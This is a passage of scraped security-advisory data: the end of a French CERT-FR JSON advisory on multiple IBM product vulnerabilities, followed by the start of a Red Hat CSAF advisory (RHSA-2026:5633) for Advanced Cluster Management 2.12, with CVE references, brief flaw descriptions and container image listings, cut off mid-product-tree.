"name": "CVE-2024-12085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12085"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2023-48795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48795"
},
{
"name": "CVE-2025-6965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2023-22043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22043"
},
{
"name": "CVE-2016-4658",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-4658"
},
{
"name": "CVE-2025-31133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31133"
},
{
"name": "CVE-2024-36621",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36621"
},
{
"name": "CVE-2024-23454",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23454"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2023-22067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22067"
},
{
"name": "CVE-2025-55173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55173"
},
{
"name": "CVE-2024-40635",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40635"
},
{
"name": "CVE-2024-48910",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48910"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-38086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38086"
},
{
"name": "CVE-2025-48068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48068"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2022-40609",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40609"
},
{
"name": "CVE-2018-5764",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5764"
},
{
"name": "CVE-2024-50264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50264"
},
{
"name": "CVE-2025-57752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57752"
},
{
"name": "CVE-2024-21634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21634"
},
{
"name": "CVE-2022-21628",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21628"
},
{
"name": "CVE-2025-38110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38110"
},
{
"name": "CVE-2020-15115",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15115"
},
{
"name": "CVE-2024-21011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21011"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2025-52881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52881"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2025-22113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22113"
},
{
"name": "CVE-2025-61724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
},
{
"name": "CVE-2025-5187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5187"
},
{
"name": "CVE-2026-1188",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1188"
},
{
"name": "CVE-2025-37797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37797"
},
{
"name": "CVE-2012-2098",
"url": "https://www.cve.org/CVERecord?id=CVE-2012-2098"
},
{
"name": "CVE-2024-41909",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41909"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2023-35887",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35887"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2025-66471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66471"
},
{
"name": "CVE-2026-21441",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21441"
},
{
"name": "CVE-2024-21147",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21147"
},
{
"name": "CVE-2024-56332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56332"
},
{
"name": "CVE-2024-25710",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25710"
},
{
"name": "CVE-2026-25765",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25765"
},
{
"name": "CVE-2025-7039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
},
{
"name": "CVE-2022-29458",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29458"
},
{
"name": "CVE-2024-39908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39908"
},
{
"name": "CVE-2025-27220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27220"
},
{
"name": "CVE-2024-29133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29133"
},
{
"name": "CVE-2025-55163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55163"
},
{
"name": "CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"name": "CVE-2025-38089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38089"
},
{
"name": "CVE-2023-2727",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2727"
},
{
"name": "CVE-2024-12905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12905"
},
{
"name": "CVE-2024-21140",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21140"
},
{
"name": "CVE-2025-36425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36425"
},
{
"name": "CVE-2024-21094",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21094"
},
{
"name": "CVE-2021-37404",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37404"
},
{
"name": "CVE-2025-58457",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58457"
},
{
"name": "CVE-2026-24842",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24842"
},
{
"name": "CVE-2025-47935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47935"
},
{
"name": "CVE-2025-22085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22085"
},
{
"name": "CVE-2025-50537",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50537"
},
{
"name": "CVE-2026-23950",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23950"
},
{
"name": "CVE-2023-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21937"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-21626",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21626"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2025-47912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2022-4450",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4450"
},
{
"name": "CVE-2016-0704",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0704"
},
{
"name": "CVE-2023-33850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33850"
},
{
"name": "CVE-2025-54410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54410"
},
{
"name": "CVE-2025-52565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52565"
},
{
"name": "CVE-2023-2597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2597"
},
{
"name": "CVE-2022-29154",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29154"
},
{
"name": "CVE-2025-1767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1767"
},
{
"name": "CVE-2025-58186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2021-22569",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22569"
},
{
"name": "CVE-2025-58187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2025-36001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36001"
},
{
"name": "CVE-2023-22045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22045"
},
{
"name": "CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"name": "CVE-2025-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
},
{
"name": "CVE-2024-21138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21138"
},
{
"name": "CVE-2024-47875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47875"
},
{
"name": "CVE-2023-22049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22049"
},
{
"name": "CVE-2025-47913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47913"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2018-14041",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14041"
},
{
"name": "CVE-2025-24294",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24294"
},
{
"name": "CVE-2025-29927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29927"
},
{
"name": "CVE-2024-25621",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25621"
},
{
"name": "CVE-2025-36365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36365"
},
{
"name": "CVE-2023-42503",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42503"
},
{
"name": "CVE-2025-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27904"
},
{
"name": "CVE-2025-32387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32387"
},
{
"name": "CVE-2025-58058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58058"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"name": "CVE-2023-5676",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5676"
},
{
"name": "CVE-2025-58189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
},
{
"name": "CVE-2025-36442",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36442"
},
{
"name": "CVE-2024-28863",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28863"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2026-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
},
{
"name": "CVE-2024-21145",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21145"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21968"
},
{
"name": "CVE-2025-5889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5889"
},
{
"name": "CVE-2025-21905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21905"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2025-7339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7339"
},
{
"name": "CVE-2025-14689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14689"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2023-21930",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21930"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2024-47072",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47072"
},
{
"name": "CVE-2024-20918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20918"
},
{
"name": "CVE-2025-41249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41249"
},
{
"name": "CVE-2025-36366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36366"
},
{
"name": "CVE-2025-36123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36123"
},
{
"name": "CVE-2025-27900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27900"
},
{
"name": "CVE-2025-0426",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0426"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2025-27899",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27899"
},
{
"name": "CVE-2025-64756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64756"
},
{
"name": "CVE-2023-22044",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22044"
},
{
"name": "CVE-2025-48997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48997"
},
{
"name": "CVE-2025-27901",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27901"
},
{
"name": "CVE-2022-45047",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45047"
},
{
"name": "CVE-2021-22570",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22570"
},
{
"name": "CVE-2024-21085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21085"
},
{
"name": "CVE-2025-48387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48387"
},
{
"name": "CVE-2024-20945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20945"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2024-21210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21210"
},
{
"name": "CVE-2025-27898",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27898"
},
{
"name": "CVE-2025-53057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53057"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2023-2728",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2728"
},
{
"name": "CVE-2024-7143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7143"
},
{
"name": "CVE-2023-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21967"
},
{
"name": "CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"name": "CVE-2022-21619",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21619"
},
{
"name": "CVE-2025-36407",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36407"
},
{
"name": "CVE-2025-7338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7338"
},
{
"name": "CVE-2025-53066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53066"
},
{
"name": "CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"name": "CVE-2025-55184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55184"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2024-27267",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27267"
},
{
"name": "CVE-2025-59343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59343"
},
{
"name": "CVE-2024-36623",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36623"
},
{
"name": "CVE-2024-20952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20952"
},
{
"name": "CVE-2024-36620",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36620"
},
{
"name": "CVE-2025-27221",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27221"
},
{
"name": "CVE-2021-20251",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20251"
},
{
"name": "CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"name": "CVE-2024-21208",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21208"
},
{
"name": "CVE-2019-8331",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8331"
},
{
"name": "CVE-2025-66418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66418"
}
],
"initial_release_date": "2026-03-06T00:00:00",
"last_revision_date": "2026-03-06T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0249",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-06T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2026-03-06",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7262753",
"url": "https://www.ibm.com/support/pages/node/7262753"
},
{
"published_at": "2026-03-06",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7262754",
"url": "https://www.ibm.com/support/pages/node/7262754"
},
{
"published_at": "2026-03-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7262324",
"url": "https://www.ibm.com/support/pages/node/7262324"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7262669",
"url": "https://www.ibm.com/support/pages/node/7262669"
},
{
"published_at": "2026-03-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7262494",
"url": "https://www.ibm.com/support/pages/node/7262494"
},
{
"published_at": "2026-03-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7262548",
"url": "https://www.ibm.com/support/pages/node/7262548"
},
{
"published_at": "2026-03-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7262325",
"url": "https://www.ibm.com/support/pages/node/7262325"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7259901",
"url": "https://www.ibm.com/support/pages/node/7259901"
}
]
}
RHSA-2026:5633
Vulnerability from csaf_redhat - Published: 2026-03-24 14:07 - Updated: 2026-04-16 11:02Early versions of Operator-SDK provided an insecure method to allow operator containers to run in environments that used a random UID. Operator-SDK before 0.15.2 provided a script, user_setup, which modifies the permissions of the /etc/passwd file to 664 during build time. Developers who used Operator-SDK before 0.15.2 to scaffold their operator may still be impacted by this if the insecure user_setup script is still being used to build new container images. In affected images, the /etc/passwd file is created during build time with group-writable permissions and a group ownership of root (gid=0). An attacker who can execute commands within an affected container, even as a non-root user, may be able to leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.
A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.
A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.
An authorization error has been discovered in Grafana dashboards. The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashboards. This is an organization‑internal privilege escalation.
A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Advanced Cluster Management for Kubernetes 2.12 General\nAvailability release images, which add new features and enhancements, bug\nfixes, and updated container images.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Advanced Cluster Management for Kubernetes 2.12 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which add new features and enhancements, bug\nfixes, and updated container images. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://docs.redhat.com/en/documentation/red_hat_advanced_cluster_management_for_kubernetes/2.12/html-single/release_notes/index#acm-release-notes",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5633",
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58183",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-7195",
"url": "https://access.redhat.com/security/cve/CVE-2025-7195"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-21721",
"url": "https://access.redhat.com/security/cve/CVE-2026-21721"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22029",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5633.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Advanced Cluster Management for Kubernetes v2.12.8 security update",
"tracking": {
"current_release_date": "2026-04-16T11:02:07+00:00",
"generator": {
"date": "2026-04-16T11:02:07+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5633",
"initial_release_date": "2026-03-24T14:07:27+00:00",
"revision_history": [
{
"date": "2026-03-24T14:07:27+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-24T14:07:37+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:02:07+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product": {
"name": "Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:acm:2.12::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Advanced Cluster Management for Kubernetes"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3A20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259176"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3A9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773283045"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773963430"
}
}
},
{
